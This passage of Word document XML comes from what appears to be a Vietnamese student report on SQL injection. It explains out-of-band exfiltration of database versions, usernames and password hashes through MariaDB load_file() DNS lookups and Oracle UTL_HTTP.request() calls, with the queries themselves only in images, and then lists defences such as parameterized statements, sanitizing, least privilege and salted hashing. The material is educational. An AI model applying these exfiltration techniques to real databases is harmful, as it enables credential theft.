                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="medium-content-serif-font;Georg" w:hAnsi="medium-content-serif-font;Georg"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B56C882" w14:textId="77777777" w:rsidR="001874B6" w:rsidRPr="00612EC6" w:rsidRDefault="001874B6" w:rsidP="00612EC6"/>
    <w:p w14:paraId="686984A2" w14:textId="3EAEA440" w:rsidR="001D0AEE" w:rsidRDefault="003B4B15" w:rsidP="003B4B15">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:bookmarkStart w:id="25" w:name="_Toc42895614"/>
      <w:r w:rsidRPr="003B4B15">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3.2. Cách khai thác</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="732BF6B7" w14:textId="77777777" w:rsidR="000F79D6" w:rsidRDefault="000F79D6" w:rsidP="000F79D6">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  Dựa trên DNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A4B2B4" w14:textId="29118568" w:rsidR="000F79D6" w:rsidRDefault="000F79D6" w:rsidP="000F79D6">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="55C70043" wp14:editId="0160F110">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>121920</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>768350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5478780" cy="1630680"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5478780" cy="1630680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Truy vấn được sử dụng để lọc ra phiên bản CSDL, tên người dùng, mật khẩu từ MariaDB(một nhánh của MySQL). Hàm load_file() được dử dụng để bắt đầu yêu cầu DNS bên ngoài và dấu “.” để ngăn cách các dữ liệu thu được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1CE69D" w14:textId="48B1509D" w:rsidR="000F79D6" w:rsidRDefault="000F79D6" w:rsidP="000F79D6">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="556E7239" w14:textId="77777777" w:rsidR="00525BF1" w:rsidRDefault="00525BF1" w:rsidP="000F79D6">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB6D6D9" w14:textId="00683EBD" w:rsidR="00525BF1" w:rsidRPr="00525BF1" w:rsidRDefault="000F79D6" w:rsidP="003B4B15">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00525BF1" w:rsidRPr="00525BF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hiển thị dữ liệu thu được:</w:t>
      </w:r>
      <w:r w:rsidR="00525BF1">
        <w:rPr>
          <w:rFonts w:ascii="medium-content-serif-font;Georg" w:hAnsi="medium-content-serif-font;Georg"/>
          <w:noProof/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3E519D0C" wp14:editId="43787D35">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>307340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6120130" cy="4221480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapSquare wrapText="largest"/>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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="4221480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE93FD6" w14:textId="7B42D000" w:rsidR="001D0AEE" w:rsidRDefault="001D0AEE"/>
    <w:p w14:paraId="35CF9C7E" w14:textId="77777777" w:rsidR="001E56C2" w:rsidRDefault="001E56C2" w:rsidP="001E56C2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Dựa trên HTTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D329958" w14:textId="7D4CF081" w:rsidR="001D0AEE" w:rsidRDefault="008F7861" w:rsidP="001E56C2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="76677A1B" wp14:editId="30BB4902">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>53340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>805815</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5575935" cy="1362075"/>
            <wp:effectExtent l="0" t="0" r="5715" b="9525"/>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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5575935" cy="1362075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="001E56C2">
        <w:t xml:space="preserve">    Truy vấn được sử dụng để lọc ra phiên bản CSDL, tên người dùng, mật khẩu đã băm từ OracleDB. Mục đích của hàm UTL_HTTP.request() là kích hoạt yêu cầu HTTP của hệ thống CSDL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279216E2" w14:textId="34870EAB" w:rsidR="001E56C2" w:rsidRDefault="001E56C2"/>
    <w:p w14:paraId="3C4A90EF" w14:textId="77777777" w:rsidR="008F7861" w:rsidRDefault="008F7861"/>
    <w:p w14:paraId="585254B2" w14:textId="3850A617" w:rsidR="001E56C2" w:rsidRPr="001E56C2" w:rsidRDefault="008F7861" w:rsidP="008F7861">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="medium-content-serif-font;Georg" w:hAnsi="medium-content-serif-font;Georg"/>
          <w:noProof/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="23C58000" wp14:editId="2FC8CAB1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>309245</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5859780" cy="4594860"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapSquare wrapText="largest"/>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30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5859780" cy="4594860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="001E56C2" w:rsidRPr="001E56C2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Dữ liệu thu được: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416DA79E" w14:textId="77777777" w:rsidR="009C28DE" w:rsidRDefault="009C28DE" w:rsidP="00466FCF"/>
    <w:p w14:paraId="00D33EC2" w14:textId="197DC5D5" w:rsidR="00D1531C" w:rsidRDefault="00AD40F6" w:rsidP="00AD40F6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc42895615"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.Cách phòng chống SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="20833D99" w14:textId="7F74919C" w:rsidR="00AD40F6" w:rsidRDefault="00AD40F6" w:rsidP="00DB65D9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="27" w:name="_Toc42895616"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1. Generic Protection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="360310A6" w14:textId="569E1D51" w:rsidR="00DB65D9" w:rsidRDefault="00DB65D9" w:rsidP="00DB65D9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DB65D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:bookmarkStart w:id="28" w:name="_Toc42895617"/>
      <w:r w:rsidRPr="00DB65D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1.1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB65D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Parameterized Statements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="0AD78A51" w14:textId="27C14CBC" w:rsidR="00DB65D9" w:rsidRDefault="00DB65D9" w:rsidP="00DB65D9">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> Thay vì truyền ngay</w:t>
      </w:r>
      <w:r w:rsidR="004C505C">
        <w:t xml:space="preserve"> đầu vào dữ liệu kết hợp với câu truy vấn, phương pháp này sẽ tách biệt chúng ra, </w:t>
      </w:r>
      <w:r w:rsidR="008D0C1B">
        <w:t xml:space="preserve">câu truy vấn sẽ được viết riêng với đầu vào, sau đó đầu vào sẽ được đẩy vào thông qua các hàm, việc này đảm bảo </w:t>
      </w:r>
      <w:r w:rsidR="00E57DFD">
        <w:t xml:space="preserve">cho sự minh bạch của các câu truy vấn. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AEE5D3" w14:textId="2215893A" w:rsidR="00E57DFD" w:rsidRDefault="00E57DFD" w:rsidP="00DB65D9">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Tuy nhiên, phương pháp này vẫn còn hạn chế nếu đầu vào không được vệ sinh một cách đúng cách</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3E299F" w14:textId="77777777" w:rsidR="00B639E7" w:rsidRDefault="00B639E7" w:rsidP="00DB65D9"/>
    <w:p w14:paraId="71BA7368" w14:textId="4163B6F9" w:rsidR="00E57DFD" w:rsidRPr="00974A7B" w:rsidRDefault="00E57DFD" w:rsidP="00974A7B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="00B639E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="29" w:name="_Toc42895618"/>
      <w:r w:rsidR="00B639E7" w:rsidRPr="00974A7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1.2. Object Relational Mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="296F4527" w14:textId="7CAF1164" w:rsidR="00B639E7" w:rsidRDefault="00B639E7" w:rsidP="00DB65D9">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sử dụng FrameWork này sẽ khiến cho các lập trình viên ít phải viết các câu truy vấn hơn, FrameWork này cũng sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="009D0B3E">
        <w:t>Parameterized Statements để truyền đầu vào dữ liệu nên độ hiệu quả cũng sẽ tương đương với phương pháp trên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633B1A65" w14:textId="6D707246" w:rsidR="009D0B3E" w:rsidRDefault="009D0B3E" w:rsidP="00DB65D9"/>
    <w:p w14:paraId="0DDCE29D" w14:textId="33AF87AC" w:rsidR="009D0B3E" w:rsidRPr="00974A7B" w:rsidRDefault="009D0B3E" w:rsidP="00974A7B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:bookmarkStart w:id="30" w:name="_Toc42895619"/>
      <w:r w:rsidRPr="00974A7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1.3. Escaping Input</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="6FF4AE2B" w14:textId="354AD5A1" w:rsidR="009D0B3E" w:rsidRDefault="00864051" w:rsidP="00DB65D9">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ta biết rằng khin inject SQL code, các ký tự như ‘, “, -- , Space được sử dụng nhiều để gây </w:t>
      </w:r>
      <w:r w:rsidR="00B01632">
        <w:t>tạo ra các câu lệnh theo ý muốn của người tấn công. Ở phương pháp này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F25A6E" w14:textId="217B19E6" w:rsidR="00B01632" w:rsidRDefault="00B01632" w:rsidP="00DB65D9">
      <w:r>
        <w:t>Chúng ta sẽ loại bỏ những ký tự đặc biệt này để tạo ra đầu vào sạch, giảm nguy cơ bị sai lệch câu truy vấn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9D5D8E" w14:textId="48E20CED" w:rsidR="00B01632" w:rsidRPr="00864051" w:rsidRDefault="00B01632" w:rsidP="00DB65D9">
      <w:r>
        <w:t>Nhưng ta phải đối mặt với một vấn đề là các ký tự này có thể được chấp nhận là đầu vào bình thường</w:t>
      </w:r>
      <w:r w:rsidR="00750C3F">
        <w:t xml:space="preserve"> trong các đoạn code khác nhau, việc escape bừa bãi sẽ khiến loại bỏ đi những đầu vào cần thiết, hệ thống lúc này sẽ không hoạt động đúng chức năng </w:t>
      </w:r>
      <w:r w:rsidR="007B4743">
        <w:t>như ban đầu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632D15F5" w14:textId="429F46F2" w:rsidR="00DB65D9" w:rsidRDefault="00DB65D9" w:rsidP="00DB65D9">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7371987D" w14:textId="7ACFD5D7" w:rsidR="00092692" w:rsidRPr="00974A7B" w:rsidRDefault="00092692" w:rsidP="00974A7B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="00974A7B">
        <w:tab/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:bookmarkStart w:id="31" w:name="_Toc42895620"/>
      <w:r w:rsidRPr="00974A7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1.4. Sanatizing Inputs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="183615A5" w14:textId="0E0DDE8D" w:rsidR="00092692" w:rsidRDefault="00092692" w:rsidP="00092692">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Đây là dạng rất ổn cho tất cả các ứng dụng, dữ liệu đáng nghi sẽ được làm sạch trước khi chuyển vào bên trong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451F8B55" w14:textId="48828B17" w:rsidR="00092692" w:rsidRDefault="00092692" w:rsidP="00092692">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Các dạng được </w:t>
      </w:r>
      <w:r w:rsidR="00D80AEB">
        <w:t>dù</w:t>
      </w:r>
      <w:r>
        <w:t>ng phổ biến:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E4A373" w14:textId="749A2457" w:rsidR="00092692" w:rsidRDefault="00092692" w:rsidP="00092692">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>+ Sử dụng Regular Expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58710ED2" w14:textId="1409BD23" w:rsidR="00092692" w:rsidRDefault="00092692" w:rsidP="00092692">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00D80AEB">
        <w:t>Các trường số và chữ sẽ không chứa các ký tự biểu tượng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A99EB6" w14:textId="7280DAD9" w:rsidR="00D80AEB" w:rsidRDefault="00D80AEB" w:rsidP="00092692">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>+ Loại bỏ khoảng trắng và dòng mới nếu thấy chúng không thích hợp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54589E9B" w14:textId="77777777" w:rsidR="00D80AEB" w:rsidRPr="00092692" w:rsidRDefault="00D80AEB" w:rsidP="00092692">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D63FDA" w14:textId="1F1A072F" w:rsidR="00092692" w:rsidRPr="00974A7B" w:rsidRDefault="00092692" w:rsidP="00974A7B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004B3647">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:bookmarkStart w:id="32" w:name="_Toc42895621"/>
      <w:r w:rsidR="004B3647" w:rsidRPr="00974A7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1.</w:t>
      </w:r>
      <w:r w:rsidR="00974A7B" w:rsidRPr="00974A7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="004B3647" w:rsidRPr="00974A7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. Others Method</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="0C1B43DD" w14:textId="77777777" w:rsidR="002B6576" w:rsidRDefault="002B6576" w:rsidP="00DB65D9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB25A04" w14:textId="046C74CA" w:rsidR="000E6D19" w:rsidRPr="000E6D19" w:rsidRDefault="000E6D19" w:rsidP="000E6D19">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="33" w:name="_Toc42895622"/>
      <w:r w:rsidRPr="000E6D19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.Principle Of Least Privilege</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="5464F4FA" w14:textId="2A0F558B" w:rsidR="004B3647" w:rsidRPr="004B3647" w:rsidRDefault="004B3647" w:rsidP="00DB65D9">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Ở trường hợp này, ứng dụng cần đảm bảo rằng các thành phần tiến trình</w:t>
      </w:r>
      <w:r w:rsidR="009329E7">
        <w:t>, ứng dụng</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chỉ có thể truy cập vào các nguồn tài nguyên cần thiết.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7414E7F1" w14:textId="3AFBABDF" w:rsidR="00AD40F6" w:rsidRDefault="004B3647" w:rsidP="00AD40F6">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009329E7">
        <w:t>Thời điểm thực thi, ứng dụng sẽ nên chỉ được cấp quyền chỉnh sửa các cấu trúc bảng mà nó được giao,</w:t>
      </w:r>
      <w:r w:rsidR="007F249B">
        <w:t xml:space="preserve"> các câu lệnh DML statements(select, insert, update, delete)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FD5EE7" w14:textId="36E49E45" w:rsidR="007F249B" w:rsidRDefault="007F249B" w:rsidP="00AD40F6">
      <w:r>
        <w:t>thay vì các câu lệnh DDL(Create, Alter, Drop)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD45147" w14:textId="4386F87E" w:rsidR="000E6D19" w:rsidRDefault="000E6D19" w:rsidP="00AD40F6">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF7C3BB" w14:textId="10E7F90A" w:rsidR="000E6D19" w:rsidRPr="00B3025C" w:rsidRDefault="000E6D19" w:rsidP="002B6576">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="34" w:name="_Toc42895623"/>
      <w:r w:rsidRPr="00B3025C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.Password hashing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="2E49B6B9" w14:textId="27950034" w:rsidR="000E6D19" w:rsidRDefault="000E6D19" w:rsidP="00AD40F6">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Đây là dạng phòng ngừa khi </w:t>
      </w:r>
      <w:r w:rsidR="00B11243">
        <w:t>kẻ tấn công đã có khả năng select các trường dữ liệu.Phương pháp này cung cấp cơ chế one-way hashes</w:t>
      </w:r>
      <w:r w:rsidR="00425AFD">
        <w:t>, các trường dữ liệu quan trọng sẽ được hashing, đảm bảo dù có lấy được dữ liệu cũng sẽ phải mất công</w:t>
      </w:r>
      <w:r w:rsidR="00C81C7A">
        <w:t xml:space="preserve"> giải mã. Để đạt được hiệu quả cao hơn thì trước khi thực hiện hashing, sẽ thêm vào đó một random token, đây gọi là phương pháp salting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A35972C" w14:textId="14F53A05" w:rsidR="00B3025C" w:rsidRDefault="00B3025C" w:rsidP="00AD40F6"/>
    <w:p w14:paraId="1EBF8CCA" w14:textId="2C41BFE8" w:rsidR="00B3025C" w:rsidRDefault="00B3025C" w:rsidP="002B6576">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="35" w:name="_Toc42895624"/>
      <w:r w:rsidRPr="00B3025C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.Third Party Authentication</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="716BE9D1" w14:textId="1F61797E" w:rsidR="00B3025C" w:rsidRPr="00B3025C" w:rsidRDefault="00B3025C" w:rsidP="00B3025C">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Nếu như tất cả các phương pháp trên đều không đem lại hiệu quả, bạn nên cân nhắc tới việc </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>sử dụng out-sourcing authentication</w:t>
      </w:r>
      <w:r w:rsidR="00D055D9">
        <w:t>, có thể kể đến là Oauth APIs do Google, Facebook cung cấp</w:t>
      </w:r>
      <w:r w:rsidR="001503FF">
        <w:t xml:space="preserve">, đảm bảo việc đăng nhập nhanh với 1 lần xác thực tài khoản, </w:t>
      </w:r>
      <w:r w:rsidR="002B6576">
        <w:t>cung cấp các phương thức xác thực khác nhau đảm bảo hiệu quả cao hơn khi thực hiện kết hợp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BB38E5" w14:textId="77777777" w:rsidR="00B3025C" w:rsidRPr="000E6D19" w:rsidRDefault="00B3025C" w:rsidP="00AD40F6"/>
    <w:p w14:paraId="79D1593E" w14:textId="4DCD4B9E" w:rsidR="007F249B" w:rsidRDefault="007F249B" w:rsidP="0060786F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
